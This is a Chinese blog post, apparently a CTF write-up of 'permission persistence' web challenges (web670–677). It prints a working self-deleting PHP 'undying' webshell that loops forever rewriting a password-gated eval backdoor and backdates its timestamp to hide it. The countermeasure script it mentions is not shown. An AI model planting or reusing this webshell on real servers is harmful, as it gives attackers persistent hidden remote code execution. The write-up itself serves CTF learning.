权限维持
不知道干点什么,干脆玩玩维权吧。
web670
1 |
|
经过尝试后发现其在check后会删文件。
而想到对抗方法当然就是内存马了,于是我在网上随便找了一个内存马1
2
3
4
5
6
7
8
9
10
11
12
ignore_user_abort(true);//允许脚本再客户端断开后进行运行
set_time_limit(0);
unlink(__FILE__);
$file = '.3.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .3.php');
usleep(5000);
}
上面的内存马只要上传后访问其web页面就会自删且不断生成马
连上不死马后发现其并没有删除所有文件,只删除了php文件
内存马对抗方法
1 |
|
通过上面的脚本来对不死马进行竞争因为脚本的运行速度比内存马快所有会将不死马的文件覆盖
web671
同样内存马
web671和676都是内存马我直接跳过
web677
我们可以看到web页面是不可写的
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 L的博客!
评论